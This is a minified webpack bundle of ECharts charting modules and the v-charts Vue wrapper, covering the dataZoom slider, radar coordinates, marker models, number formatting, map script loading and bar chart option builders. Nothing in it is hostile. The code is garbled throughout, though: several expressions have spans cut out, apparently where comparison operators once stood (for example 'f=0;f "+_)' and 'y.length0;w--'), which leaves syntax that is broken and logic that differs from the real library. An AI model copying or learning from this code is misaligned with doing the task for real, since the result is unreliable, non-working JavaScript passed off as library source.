i=n("6d8b"),r=n("607d"),o=n("2306"),a=n("88b3"),s=n("7dcf"),l=n("3842"),u=n("f934"),c=n("ef6a"),h=o.Rect,d=l.linearMap,f=l.asc,p=i.bind,g=i.each,m=7,v=1,y=30,_="horizontal",b="vertical",x=5,w=["line","bar","candlestick","scatter"],k=s.extend({type:"dataZoom.slider",init:function(e,t){this._displayables={},this._orient,this._range,this._handleEnds,this._size,this._handleWidth,this._handleHeight,this._location,this._dragging,this._dataShadowInfo,this.api=t},render:function(e,t,n,i){k.superApply(this,"render",arguments),a.createOrUpdate(this,"_dispatchZoomAction",this.dataZoomModel.get("throttle"),"fixRate"),this._orient=e.get("orient"),!1!==this.dataZoomModel.get("show")?(i&&"dataZoom"===i.type&&i.from===this.uid||this._buildView(),this._updateView()):this.group.removeAll()},remove:function(){k.superApply(this,"remove",arguments),a.clear(this,"_dispatchZoomAction")},dispose:function(){k.superApply(this,"dispose",arguments),a.clear(this,"_dispatchZoomAction")},_buildView:function(){var e=this.group;e.removeAll(),this._resetLocation(),this._resetInterval();var t=this._displayables.barGroup=new o.Group;this._renderBackground(),this._renderHandle(),this._renderDataShadow(),e.add(t),this._positionGroup()},_resetLocation:function(){var e=this.dataZoomModel,t=this.api,n=this._findCoordRect(),r={width:t.getWidth(),height:t.getHeight()},o=this._orient===_?{right:r.width-n.x-n.width,top:r.height-y-m,width:n.width,height:y}:{right:m,top:n.y,width:y,height:n.height},a=u.getLayoutParams(e.option);i.each(["right","top","width","height"],(function(e){"ph"===a[e]&&(a[e]=o[e])}));var s=u.getLayoutRect(a,r,e.padding);this._location={x:s.x,y:s.y},this._size=[s.width,s.height],this._orient===b&&this._size.reverse()},_positionGroup:function(){var e=this.group,t=this._location,n=this._orient,i=this.dataZoomModel.getFirstTargetAxisModel(),r=i&&i.get("inverse"),o=this._displayables.barGroup,a=(this._dataShadowInfo||{}).otherAxisInverse;o.attr(n!==_||r?n===_&&r?{scale:a?[-1,1]:[-1,-1]}:n!==b||r?{scale:a?[-1,-1]:[-1,1],rotation:Math.PI/2}:{scale:a?[1,-1]:[1,1],rotation:Math.PI/2}:{scale:a?[1,1]:[1,-1]});var s=e.getBoundingRect([o]);e.attr("position",[t.x-s.x,t.y-s.y])},_getViewExtent:function(){return[0,this._size[0]]},_renderBackground:function(){var e=this.dataZoomModel,t=this._size,n=this._displayables.barGroup;n.add(new h({silent:!0,shape:{x:0,y:0,width:t[0],height:t[1]},style:{fill:e.get("backgroundColor")},z2:-40})),n.add(new h({shape:{x:0,y:0,width:t[0],height:t[1]},style:{fill:"transparent"},z2:0,onclick:i.bind(this._onClickPanelClick,this)}))},_renderDataShadow:function(){var e=this._dataShadowInfo=this._prepareDataShadowInfo();if(e){var t=this._size,n=e.series,r=n.getRawData(),a=n.getShadowDim?n.getShadowDim():e.otherDim;if(null!=a){var s=r.getDataExtent(a),l=.3*(s[1]-s[0]);s=[s[0]-l,s[1]+l];var u,c=[0,t[1]],h=[0,t[0]],f=[[t[0],0],[0,0]],p=[],g=h[1]/(r.count()-1),m=0,v=Math.round(r.count()/t[0]);r.each([a],(function(e,t){if(v>0&&t%v)m+=g;else{var n=null==e||isNaN(e)||""===e,i=n?0:d(e,s,c,!0);n&&!u&&t?(f.push([f[f.length-1][0],0]),p.push([p[p.length-1][0],0])):!n&&u&&(f.push([m,0]),p.push([m,0])),f.push([m,i]),p.push([m,i]),m+=g,u=n}}));var y=this.dataZoomModel;this._displayables.barGroup.add(new o.Polygon({shape:{points:f},style:i.defaults({fill:y.get("dataBackgroundColor")},y.getModel("dataBackground.areaStyle").getAreaStyle()),silent:!0,z2:-20})),this._displayables.barGroup.add(new o.Polyline({shape:{points:p},style:y.getModel("dataBackground.lineStyle").getLineStyle(),silent:!0,z2:-19}))}}},_prepareDataShadowInfo:function(){var e=this.dataZoomModel,t=e.get("showDataShadow");if(!1!==t){var n,r=this.ecModel;return e.eachTargetAxis((function(o,a){var s=e.getAxisProxy(o.name,a).getTargetSeriesModels();i.each(s,(function(e){if(!n&&!(!0!==t&&i.indexOf(w,e.get("type"))<0)){var s,l=r.getComponent(o.axis,a).axis,u=S(o.name),c=e.coordinateSystem;null!=u&&c.getOtherAxis&&(s=c.getOtherAxis(l).inverse),u=e.getData().mapDimension(u),n={thisAxis:l,series:e,thisDim:o.name,otherDim:u,otherAxisInverse:s}}}),this)}),this),n}},_renderHandle:function(){var e=this._displayables,t=e.handles=[],n=e.handleLabels=[],i=this._displayables.barGroup,r=this._size,a=this.dataZoomModel;i.add(e.filler=new h({draggable:!0,cursor:M(this._orient),drift:p(this._onDragMove,this,"all"),ondragstart:p(this._showDataInfo,this,!0),ondragend:p(this._onDragEnd,this),onmouseover:p(this._showDataInfo,this,!0),onmouseout:p(this._showDataInfo,this,!1),style:{fill:a.get("fillerColor"),textPosition:"inside"}})),i.add(new h({silent:!0,subPixelOptimize:!0,shape:{x:0,y:0,width:r[0],height:r[1]},style:{stroke:a.get("dataBackgroundColor")||a.get("borderColor"),lineWidth:v,fill:"rgba(0,0,0,0)"}})),g([0,1],(function(e){var r=o.createIcon(a.get("handleIcon"),{cursor:M(this._orient),draggable:!0,drift:p(this._onDragMove,this,e),ondragend:p(this._onDragEnd,this),onmouseover:p(this._showDataInfo,this,!0),onmouseout:p(this._showDataInfo,this,!1)},{x:-1,y:0,width:2,height:2}),s=r.getBoundingRect();this._handleHeight=l.parsePercent(a.get("handleSize"),this._size[1]),this._handleWidth=s.width/s.height*this._handleHeight,r.setStyle(a.getModel("handleStyle").getItemStyle());var u=a.get("handleColor");null!=u&&(r.style.fill=u),i.add(t[e]=r);var c=a.textStyleModel;this.group.add(n[e]=new o.Text({silent:!0,invisible:!0,style:{x:0,y:0,text:"",textVerticalAlign:"middle",textAlign:"center",textFill:c.getTextColor(),textFont:c.getFont()},z2:10}))}),this)},_resetInterval:function(){var e=this._range=this.dataZoomModel.getPercentRange(),t=this._getViewExtent();this._handleEnds=[d(e[0],[0,100],t,!0),d(e[1],[0,100],t,!0)]},_updateInterval:function(e,t){var n=this.dataZoomModel,i=this._handleEnds,r=this._getViewExtent(),o=n.findRepresentativeAxisProxy().getMinMaxSpan(),a=[0,100];c(t,i,r,n.get("zoomLock")?"all":e,null!=o.minSpan?d(o.minSpan,a,r,!0):null,null!=o.maxSpan?d(o.maxSpan,a,r,!0):null);var s=this._range,l=this._range=f([d(i[0],r,a,!0),d(i[1],r,a,!0)]);return!s||s[0]!==l[0]||s[1]!==l[1]},_updateView:function(e){var t=this._displayables,n=this._handleEnds,i=f(n.slice()),r=this._size;g([0,1],(function(e){var i=t.handles[e],o=this._handleHeight;i.attr({scale:[o/2,o/2],position:[n[e],r[1]/2-o/2]})}),this),t.filler.setShape({x:i[0],y:0,width:i[1]-i[0],height:r[1]}),this._updateDataInfo(e)},_updateDataInfo:function(e){var t=this.dataZoomModel,n=this._displayables,i=n.handleLabels,r=this._orient,a=["",""];if(t.get("showDetail")){var s=t.findRepresentativeAxisProxy();if(s){var l=s.getAxisModel().axis,u=this._range,c=e?s.calculateDataWindow({start:u[0],end:u[1]}).valueWindow:s.getDataValueWindow();a=[this._formatLabel(c[0],l),this._formatLabel(c[1],l)]}}var h=f(this._handleEnds.slice());function d(e){var t=o.getTransform(n.handles[e].parent,this.group),s=o.transformDirection(0===e?"right":"left",t),l=this._handleWidth/2+x,u=o.applyTransform([h[e]+(0===e?-l:l),this._size[1]/2],t);i[e].setStyle({x:u[0],y:u[1],textVerticalAlign:r===_?"middle":s,textAlign:r===_?s:"center",text:a[e]})}d.call(this,0),d.call(this,1)},_formatLabel:function(e,t){var n=this.dataZoomModel,r=n.get("labelFormatter"),o=n.get("labelPrecision");null!=o&&"auto"!==o||(o=t.getPixelPrecision());var a=null==e||isNaN(e)?"":"category"===t.type||"time"===t.type?t.scale.getLabel(Math.round(e)):e.toFixed(Math.min(o,20));return i.isFunction(r)?r(e,a):i.isString(r)?r.replace("{value}",a):a},_showDataInfo:function(e){e=this._dragging||e;var t=this._displayables.handleLabels;t[0].attr("invisible",!e),t[1].attr("invisible",!e)},_onDragMove:function(e,t,n,i){this._dragging=!0,r.stop(i.event);var a=this._displayables.barGroup.getLocalTransform(),s=o.applyTransform([t,n],a,!0),l=this._updateInterval(e,s[0]),u=this.dataZoomModel.get("realtime");this._updateView(!u),l&&u&&this._dispatchZoomAction()},_onDragEnd:function(){this._dragging=!1,this._showDataInfo(!1);var e=this.dataZoomModel.get("realtime");!e&&this._dispatchZoomAction()},_onClickPanelClick:function(e){var t=this._size,n=this._displayables.barGroup.transformCoordToLocal(e.offsetX,e.offsetY);if(!(n[0]<0||n[0]>t[0]||n[1]<0||n[1]>t[1])){var i=this._handleEnds,r=(i[0]+i[1])/2,o=this._updateInterval("all",n[0]-r);this._updateView(),o&&this._dispatchZoomAction()}},_dispatchZoomAction:function(){var e=this._range;this.api.dispatchAction({type:"dataZoom",from:this.uid,dataZoomId:this.dataZoomModel.id,start:e[0],end:e[1]})},_findCoordRect:function(){var e;if(g(this.getTargetCoordInfo(),(function(t){if(!e&&t.length){var n=t[0].model.coordinateSystem;e=n.getRect&&n.getRect()}})),!e){var t=this.api.getWidth(),n=this.api.getHeight();e={x:.2*t,y:.2*n,width:.6*t,height:.6*n}}return e}});function S(e){var t={x:"y",y:"x",radius:"angle",angle:"radius"};return t[e]}function M(e){return"vertical"===e?"ns-resize":"ew-resize"}var A=k;e.exports=A},"237f":function(e,t,n){var i=n("6d8b"),r=n("6179"),o=n("7368"),a=n("31d9"),s=n("b1d4"),l=n("2039"),u=n("3301");function c(e,t,n,c,h){for(var d=new o(c),f=0;f "+_)),m++)}var b,x=n.get("coordinateSystem");if("cartesian2d"===x||"polar"===x)b=u(e,n);else{var w=l.get(x),k=w&&"view"!==w.type&&w.dimensions||[];i.indexOf(k,"value")<0&&k.concat(["value"]);var S=s(e,{coordDimensions:k});b=new r(S,n),b.initData(e)}var M=new r(["value"],n);return M.initData(g,p),h&&h(b,M),a({mainData:b,struct:d,structAttr:"graph",datas:{node:b,edge:M},datasAttr:{node:"data",edge:"edgeData"}}),d.update(),d}e.exports=c},"23cb":function(e,t,n){var i=n("a691"),r=Math.max,o=Math.min;e.exports=function(e,t){var n=i(e);return n<0?r(n+t,0):o(n,t)}},"23e0":function(e,t,n){var i=n("6d8b"),r=n("7887"),o=n("89e3"),a=n("3842"),s=n("697e"),l=s.getScaleExtent,u=s.niceScaleExtent,c=n("2039"),h=n("8c2a");function d(e,t,n){this._model=e,this.dimensions=[],this._indicatorAxes=i.map(e.getIndicatorModels(),(function(e,t){var n="indicator_"+t,i=new r(n,"log"===e.get("axisType")?new h:new o);return i.name=e.get("name"),i.model=e,e.axis=i,this.dimensions.push(n),i}),this),this.resize(e,n),this.cx,this.cy,this.r,this.r0,this.startAngle}d.prototype.getIndicatorAxes=function(){return this._indicatorAxes},d.prototype.dataToPoint=function(e,t){var n=this._indicatorAxes[t];return this.coordToPoint(n.dataToCoord(e),t)},d.prototype.coordToPoint=function(e,t){var n=this._indicatorAxes[t],i=n.angle,r=this.cx+e*Math.cos(i),o=this.cy-e*Math.sin(i);return[r,o]},d.prototype.pointToData=function(e){var t=e[0]-this.cx,n=e[1]-this.cy,i=Math.sqrt(t*t+n*n);t/=i,n/=i;for(var r,o=Math.atan2(-n,t),a=1/0,s=-1,l=0;ln[0]&&isFinite(g)&&isFinite(n[0]))}else{var f=r.getTicks().length-1;f>o&&(d=s(d));var p=Math.ceil(n[1]/d)*d,g=a.round(p-d*o);r.setExtent(g,p),r.setInterval(d)}}))},d.dimensions=[],d.create=function(e,t){var n=[];return e.eachComponent("radar",(function(i){var r=new d(i,e,t);n.push(r),i.coordinateSystem=r})),e.eachSeriesByType("radar",(function(e){"radar"===e.get("coordinateSystem")&&(e.coordinateSystem=n[e.get("radarIndex")||0])})),n},c.register("radar",d);var f=d;e.exports=f},"23e7":function(e,t,n){var i=n("da84"),r=n("06cf").f,o=n("9112"),a=n("6eeb"),s=n("ce4e"),l=n("e893"),u=n("94ca");e.exports=function(e,t){var n,c,h,d,f,p,g=e.target,m=e.global,v=e.stat;if(c=m?i:v?i[g]||s(g,{}):(i[g]||{}).prototype,c)for(h in t){if(f=t[h],e.noTargetGet?(p=r(c,h),d=p&&p.value):d=c[h],n=u(m?h:g+(v?".":"#")+h,e.forced),!n&&void 0!==d){if(typeof f===typeof d)continue;l(f,d)}(e.sham||d&&d.sham)&&o(f,"sham",!0),a(c,h,f,e)}}},"23ee":function(e,t,n){var i=n("3eba");n("879e"),n("9704"),n("d747");var r=n("675a"),o=n("7f96"),a=n("2943"),s=n("de6e"),l=n("d357"),u=n("adda"),c=n("5866"),h=n("7b0c");i.registerProcessor(r),i.registerVisual(o("graph","circle",null)),i.registerVisual(a),i.registerVisual(s),i.registerLayout(l),i.registerLayout(i.PRIORITY.VISUAL.POST_CHART_LAYOUT,u),i.registerLayout(c),i.registerCoordinateSystem("graphView",{create:h})},"241c":function(e,t,n){var i=n("ca84"),r=n("7839"),o=r.concat("length","prototype");t.f=Object.getOwnPropertyNames||function(e){return i(e,o)}},2449:function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("3eba")),o=n("6d8b"),a=n("22d1"),s=n("e0d3"),l=n("eda2"),u=n("38a2"),c=l.addCommas,h=l.encodeHTML;function d(e){s.defaultEmphasis(e,"label",["show"])}var f=r.extendComponentModel({type:"marker",dependencies:["series","grid","polar","geo"],init:function(e,t,n){this.mergeDefaultAndTheme(e,n),this._mergeOption(e,n,!1,!0)},isAnimationEnabled:function(){if(a.node)return!1;var e=this.__hostSeries;return this.getShallow("animation")&&e&&e.isAnimationEnabled()},mergeOption:function(e,t){this._mergeOption(e,t,!1,!1)},_mergeOption:function(e,t,n,i){var r=this.constructor,a=this.mainType+"Model";n||t.eachSeries((function(e){var n=e.get(this.mainType,!0),s=e[a];n&&n.data?(s?s._mergeOption(n,t,!0):(i&&d(n),o.each(n.data,(function(e){e instanceof Array?(d(e[0]),d(e[1])):d(e)})),s=new r(n,this,t),o.extend(s,{mainType:this.mainType,seriesIndex:e.seriesIndex,name:e.name,createdBySelf:!0}),s.__hostSeries=e),e[a]=s):e[a]=null}),this)},formatTooltip:function(e,t,n,i){var r=this.getData(),a=this.getRawValue(e),s=o.isArray(a)?o.map(a,c).join(", "):c(a),l=r.getName(e),u=h(this.name),d="html"===i?"
":"\n";return(null!=a||l)&&(u+=d),l&&(u+=h(l),null!=a&&(u+=" : ")),null!=a&&(u+=h(s)),u},getData:function(){return this._data},setData:function(e){this._data=e}});o.mixin(f,u);var p=f;e.exports=p},"24b9":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("f934")),o=n("3842"),a=o.parsePercent,s=o.linearMap;function l(e,t){return r.getLayoutRect(e.getBoxLayoutParams(),{width:t.getWidth(),height:t.getHeight()})}function u(e,t){for(var n=e.mapDimension("value"),i=e.mapArray(n,(function(e){return e})),r=[],o="ascending"===t,a=0,s=e.count();a1?arguments[1]:void 0)}})},"255c":function(e,t,n){var i=n("3eba"),r=n("d4d1"),o=r.Polygon,a=n("2306"),s=n("6d8b"),l=s.bind,u=s.extend,c=n("80f0"),h=i.extendChartView({type:"themeRiver",init:function(){this._layers=[]},render:function(e,t,n){var i=e.getData(),r=this.group,s=e.getLayerSeries(),h=i.getLayout("layoutInfo"),f=h.rect,p=h.boundaryGap;function g(e){return e.name}r.attr("position",[0,f.y+p[0]]);var m=new c(this._layersSeries||[],s,g,g),v={};function y(t,n,l){var c=this._layers;if("remove"!==t){for(var h,f,p,g=[],m=[],y=s[n].indices,_=0;_'].join("")},a=["initOptions","loading","dataEmpty","judgeWidth","widthChangeDelay"],s=["grid","dataZoom","visualMap","toolbox","title","legend","xAxis","yAxis","radar","tooltip","axisPointer","brush","geo","timeline","graphic","series","backgroundColor","textStyle"],l={th:3,mi:6,bi:9,tr:12},u={zeroFormat:null,nullFormat:null,defaultFormat:"0,0",scalePercentBy100:!0,abbrLabel:{th:"k",mi:"m",bi:"b",tr:"t"}},c=1e12,h=1e9,d=1e6,f=1e3;function p(e){return"number"===typeof e&&isNaN(e)}function g(e,t,n,i){var r=e.toString().split("."),o=t-(i||0),a=2===r.length?Math.min(Math.max(r[1].length,o),t):o,s=Math.pow(10,a),l=(n(e+"e+"+a)/s).toFixed(a);if(i>t-a){var u=new RegExp("\\.?0{1,"+(i-(t-a))+"}$");l=l.replace(u,"")}return l}function m(e,t,n,i){var r=Math.abs(t),o=!1,a=!1,s="",u="",p=!1,m=void 0,v=void 0;n=n||"",t=t||0,~n.indexOf("(")?(o=!0,n=n.replace(/[(|)]/g,"")):(~n.indexOf("+")||~n.indexOf("-"))&&(v=~n.indexOf("+")?n.indexOf("+"):t<0?n.indexOf("-"):-1,n=n.replace(/[+|-]/g,"")),~n.indexOf("a")&&(m=n.match(/a(k|m|b|t)?/),m=!!m&&m[1],~n.indexOf(" a")&&(s=" "),n=n.replace(new RegExp(s+"a[kmbt]?"),""),r>=c&&!m||"t"===m?(s+=e.abbrLabel.tr,t/=c):r=h&&!m||"b"===m?(s+=e.abbrLabel.bi,t/=h):r=d&&!m||"m"===m?(s+=e.abbrLabel.mi,t/=d):(r=f&&!m||"k"===m)&&(s+=e.abbrLabel.th,t/=f)),~n.indexOf("[.]")&&(a=!0,n=n.replace("[.]","."));var y=t.toString().split(".")[0],_=n.split(".")[1],b=n.indexOf(","),x=(n.split(".")[0].split(",")[0].match(/0/g)||[]).length;if(_?(~_.indexOf("[")?(_=_.replace("]",""),_=_.split("["),u=g(t,_[0].length+_[1].length,i,_[1].length)):u=g(t,_.length,i),y=u.split(".")[0],u=~u.indexOf(".")?"."+u.split(".")[1]:"",a&&0===+u.slice(1)&&(u="")):y=g(t,0,i),s&&!m&&+y>=1e3&&s!==l.trillion&&(y=""+ +y/1e3,s=l.million),~y.indexOf("-")&&(y=y.slice(1),p=!0),y.length0;w--)y="0"+y;b>-1&&(y=y.toString().replace(/(\d)(?=(\d{3})+(?!\d))/g,"$1,")),n.indexOf(".")||(y="");var k=y+u+(s||"");return o?k=(o&&p?"(":"")+k+(o&&p?")":""):v>=0?k=0===v?(p?"-":"+")+k:k+(p?"-":"+"):p&&(k="-"+k),k}function v(e,t){Object.keys(t).forEach((function(n){e[n]=t[n]}))}var y={regexp:/%/,format:function(e,t,n,i){var r=~t.indexOf(" %")?" ":"",o=void 0;return i.options.scalePercentBy100&&(e*=100),t=t.replace(/\s?%/,""),o=i._numberToFormat(e,t,n),~o.indexOf(")")?(o=o.split(""),o.splice(-1,0,r+"%"),o=o.join("")):o=o+r+"%",o}},_={},b={};function x(e,t,n){t=t||_.defaultFormat,n=n||Math.round;var i=void 0,r=void 0;if(0===e&&null!==_.zeroFormat)i=_.zeroFormat;else if(null===e&&null!==_.nullFormat)i=_.nullFormat;else{for(var o in b)if(b[o]&&t.match(b[o].regexp)){r=b[o].format;break}r=r||m.bind(null,_),i=r(e,t,n,w)}return i}function w(e,t,n){var i=void 0;return i=0===e||"undefined"===typeof e?0:null===e||p(e)?null:"string"===typeof e?_.zeroFormat&&e===_.zeroFormat?0:_.nullFormat&&e===_.nullFormat||!e.replace(/[^0-9]+/g,"").length?null:+e:+e||null,x(i,t,n)}v(_,u),w.options=_,w._numberToFormat=m.bind(null,_),w.register=function(e,t){b[e]=t},w.unregister=function(e){b[e]=null},w.setOptions=function(e){v(_,e)},w.reset=function(){v(_,u)},w.register("percentage",y);var k="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},S=function(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e},M=Object.assign||function(e){for(var t=1;t3&&void 0!==arguments[3]?arguments[3]:"-";if(isNaN(e))return i;if(!t)return e;if(R(t))return t(e,w);n=isNaN(n)?0:++n;var r=".["+new Array(n).join(0)+"]",o=t;switch(t){case"KMB":o=n?"0,0"+r+"a":"0,0a";break;case"normal":o=n?"0,0"+r:"0,0";break;case"percent":o=n?"0,0"+r+"%":"0,0.[00]%";break}return w(e,o)},j=function(e){var t={};return Object.keys(e).forEach((function(n){e[n].forEach((function(e){t[e]=n}))})),t},H=function(e){return new Promise((function(t,n){var i=new XMLHttpRequest;i.open("GET",e),i.send(null),i.onload=function(){t(JSON.parse(i.responseText))},i.onerror=function(){n(JSON.parse(i.responseText))}}))},q={},G=function(e){var t=e.position,n=e.positionJsonLink,i=e.beforeRegisterMapOnce,r=e.mapURLProfix,o=n||""+r+t+".json";return q[o]||(q[o]=H(o).then((function(e){return i&&(e=i(e)),e}))),q[o]},W=null,$=null,U=function(e,t){return W||(W=new Promise((function(n,i){var r="bmap"+Date.now();window[r]=n;var o=document.createElement("script");o.src=["https://api.map.baidu.com/api?v="+(t||"2.0"),"ak="+e,"callback="+r].join("&"),document.body.appendChild(o)}))),W},Z=function(e,t){return $||($=new Promise((function(n,i){var r="amap"+Date.now();window[r]=n;var o=document.createElement("script");o.src=["https://webapi.amap.com/maps?v="+(t||"1.4.3"),"key="+e,"callback="+r].join("&"),document.body.appendChild(o)}))),$};function Y(e,t,n){void 0!==e[t]?e[t].push(n):e[t]=[n]}var X=.5;function K(e){var t=e.innerRows,n=e.dimAxisName,i=e.dimension,r=e.axisVisible,o=e.dimAxisType,a=e.dims;return i.map((function(e){return{type:"category",name:n,nameLocation:"middle",nameGap:22,data:"value"===o?J(a):t.map((function(t){return t[e]})),axisLabel:{formatter:function(e){return String(e)}},show:r}}))}function J(e){for(var t=Math.max.apply(null,e),n=Math.min.apply(null,e),i=[],r=n;r<=t;r++)i.push(r);return i}function Q(e){for(var t=e.meaAxisName,n=e.meaAxisType,i=e.axisVisible,r=e.digit,o=e.scale,a=e.min,s=e.max,l={type:"value",axisTick:{show:!1},show:i},u=[],c=function(e){n[e]?u[e]=M({},l,{axisLabel:{formatter:function(t){return B(t,n[e],r)}}}):u[e]=M({},l),u[e].name=t[e]||"",u[e].scale=o[e]||!1,u[e].min=a[e]||null,u[e].max=s[e]||null},h=0;h<2;h++)c(h);return u}function ee(e){var t=e.axisSite,n=e.isHistogram,i=e.meaAxisType,r=e.digit,a=e.labelMap,s=n?t.right||[]:t.top||[];return a&&(s=s.map((function(e){return void 0===a[e]?e:a[e]}))),{trigger:"axis",formatter:function(e){var t=[];return t.push(e[0].name+"
"),e.forEach((function(e){var n=e.seriesName,a=~s.indexOf(n)?i[1]:i[0];t.push(o(e.color)),t.push(n+": "),t.push(B(e.value,a,r)),t.push("
")})),t.join("")}}}function te(e,t){for(var n=Math.max.apply(null,t),i=Math.min.apply(null,t),r=[],o=i;o<=n;o++){var a=t.indexOf(o);~a?r.push(e[a]):r.push(null)}return r}function ne(e){var t=e.innerRows,n=e.metrics,i=e.stack,r=e.axisSite,o=e.isHistogram,a=e.labelMap,s=e.itemStyle,l=e.label,u=e.showLine,c=void 0===u?[]:u,h=e.dimAxisType,d=e.barGap,f=e.opacity,p=e.dims,g=[],m={},v=o?r.right||[]:r.top||[],y=o?"yAxisIndex":"xAxisIndex",_=i&&j(i);return n.forEach((function(e){m[e]=[]})),t.forEach((function(e){n.forEach((function(t){m[t].push(e[t])}))})),g=Object.keys(m).map((function(e,t){var n="value"===h?te(m[e],p):m[e],r=S({name:null!=a[e]?a[e]:e,type:~c.indexOf(e)?"line":"bar",data:n},y,~v.indexOf(e)?"1":"0");i&&_[e]&&(r.stack=_[e]),l&&(r.label=l),s&&(r.itemStyle=s);var o=f||I(r,"itemStyle.normal.opacity");return"value"===h&&(r.barGap=d,r.barCategoryGap="1%",null==o&&(o=X)),null!=o&&T(r,"itemStyle.normal.opacity",o),r})),!!g.length&&g}function ie(e){var t=e.metrics,n=e.labelMap,i=e.legendName;if(!i&&!n)return{data:t};var r=n?t.map((function(e){return null==n[e]?e:n[e]})):t;return{data:r,formatter:function(e){return null!=i[e]?i[e]:e}}}function re(e,t){return e.map((function(e){return e[t[0]]}))}var oe=function(e,t,n,i){var r=N(t),o=n.axisSite,a=void 0===o?{}:o,s=n.dimension,l=void 0===s?[e[0]]:s,u=n.stack,c=void 0===u?{}:u,h=n.axisVisible,d=void 0===h||h,f=n.digit,p=void 0===f?2:f,g=n.dataOrder,m=void 0!==g&&g,v=n.scale,y=void 0===v?[!1,!1]:v,_=n.min,b=void 0===_?[null,null]:_,x=n.max,w=void 0===x?[null,null]:x,k=n.legendName,S=void 0===k?{}:k,M=n.labelMap,A=void 0===M?{}:M,C=n.label,T=n.itemStyle,I=n.showLine,D=n.barGap,L=void 0===D?"-100%":D,E=n.opacity,O=i.tooltipVisible,P=i.legendVisible,R=e.slice();a.top&&a.bottom?R=a.top.concat(a.bottom):a.bottom&&!a.right?R=a.bottom:n.metrics?R=n.metrics:R.splice(e.indexOf(l[0]),1);var z=n.xAxisType||["normal","normal"],F=n.yAxisType||"category",V=n.xAxisName||[],B=n.yAxisName||"",j=!1;if(m){var H=m.label,q=m.order;H&&q?r.sort((function(e,t){return"desc"===q?e[H]-t[H]:t[H]-e[H]})):console.warn("Need to provide name and order parameters")}var G=re(r,l),W=P&&ie({metrics:R,labelMap:A,legendName:S}),$=K({innerRows:r,dimAxisName:B,dimension:l,axisVisible:d,dimAxisType:F,dims:G}),U=Q({meaAxisName:V,meaAxisType:z,axisVisible:d,digit:p,scale:y,min:b,max:w}),Z=ne({innerRows:r,metrics:R,stack:c,axisSite:a,isHistogram:j,labelMap:A,itemStyle:T,label:C,showLine:I,dimAxisType:F,dimension:l,barGap:L,opacity:E,dims:G}),Y={axisSite:a,isHistogram:j,meaAxisType:z,digit:p,labelMap:A},X=O&&ee(Y),J={legend:W,yAxis:$,series:Z,xAxis:U,tooltip:X};return J},ae=function(e,t,n,i){var r=N(t),o=n.axisSite,a=void 0===o?{}:o,s=n.dimension,l=void 0===s?[e[0]]:s,u=n.stack,c=void 0===u?{}:u,h=n.axisVisible,d=void 0===h||h,f=n.digit,p=void 0===f?2:f,g=n.dataOrder,m=void 0!==g&&g,v=n.scale,y=void 0===v?[!1,!1]:v,_=n.min,b=void 0===_?[null,null]:_,x=n.max,w=void 0===x?[null,null]:x,k=n.labelMap,S=void 0===k?{}:k,M=n.legendName,A=void 0===M?{}:M,C=n.label,T=n.itemStyle,I=n.showLine,D=n.barGap,L=void 0===D?"-100%":D,E=n.opacity;if(m){var O=m.label,P=m.order;O&&P?r.sort((function(e,t){return"desc"===P?e[O]-t[O]:t[O]-e[O]})):console.warn("Need to provide name and order parameters")}var R=i.tooltipVisible,z=i.legendVisible,F=e.slice();a.left&&a.right?F=a.left.concat(a.right):a.left&&!a.right?F=a.left:n.metrics?F=n.metrics:F.splice(e.indexOf(l[0]),1);var V=n.yAxisType||["normal","normal"],B=n.xAxisType||"category",j=n.yAxisName||[],H=n.xAxisName||"",q=!0,G=re(r,l),W=z&&ie({metrics:F,labelMap:S,legendName:A}),$=K({innerRows:r,dimAxisName:H,dimension:l,axisVisible:d,dimAxisType:B,dims:G}),U=Q({meaAxisName:j,meaAxisType:V,axisVisible:d,digit:p,scale:y,min:b,max:w}),Z=ne({innerRows:r,metrics:F,stack:c,axisSite:a,isHistogram:q,labelMap:S,itemStyle:T,label:C,showLine:I,dimAxisType:B,dimension:l,barGap:L,opacity:E,dims:G}),Y={axisSite:a,isHistogram:q,meaAxisType:V,digit:p,labelMap:S},X=R&&ee(Y),J={legend:W,yAxis:U,series:Z,xAxis:$,tooltip:X};return J},se={render:function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticClass:"v-charts-component-loading"},[n("div",{staticClass:"loader"},[n("div",{staticClass:"loading-spinner"},[n("svg",{staticClass:"circular",attrs:{viewBox:"25 25 50 50"}},[n("circle",{staticClass:"path",attrs:{cx:"50",cy:"50",r:"20",fill:"none"}})])])])])},staticRenderFns:[]},le={render:function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticClass:"v-charts-data-empty"},[e._v(" 暂无数据 ")])},staticRenderFns:[]};function ue(e,t){Object.keys(t).forEach((function(n){var i=t[n];~n.indexOf(".")?T(e,n,i):"function"===typeof i?e[n]=i(e[n]):P(e[n])&&O(e[n][0])?e[n].forEach((function(t,r){e[n][r]=M({},t,i)})):O(e[n])?e[n]=M({},e[n],i):e[n]=i}))}function ce(e,t){Object.keys(t).forEach((function(n){t[n]&&(e[n]=t[n])}))}function he(e,t){Object.keys(t).forEach((function(n){e[n]=t[n]}))}var de={render:function(e){return e("div",{class:[z(this.$options.name||this.$options._componentTag)],style:this.canvasStyle},[e("div",{style:this.canvasStyle,class:{"v-charts-mask-status":this.dataEmpty||this.loading},ref:"canvas"}),e(le,{style:{display:this.dataEmpty?"":"none"}}),e(se,{style:{display:this.loading?"":"none"}}),this.$slots.default])},props:{data:{type:[Object,Array],default:function(){return{}}},settings:{type:Object,default:function(){return{}}},width:{type:String,default:"auto"},height:{type:String,default:"400px"},beforeConfig:{type:Function},afterConfig:{type:Function},afterSetOption:{type:Function},afterSetOptionOnce:{type:Function},events:{type:Object},grid:{type:[Object,Array]},colors:{type:Array},tooltipVisible:{type:Boolean,default:!0},legendVisible:{type:Boolean,default:!0},legendPosition:{type:String},markLine:{type:Object},markArea:{type:Object},markPoint:{type:Object},visualMap:{type:[Object,Array]},dataZoom:{type:[Object,Array]},toolbox:{type:[Object,Array]},initOptions:{type:Object,default:function(){return{}}},title:[Object,Array],legend:[Object,Array],xAxis:[Object,Array],yAxis:[Object,Array],radar:Object,tooltip:Object,axisPointer:[Object,Array],brush:[Object,Array],geo:[Object,Array],timeline:[Object,Array],graphic:[Object,Array],series:[Object,Array],backgroundColor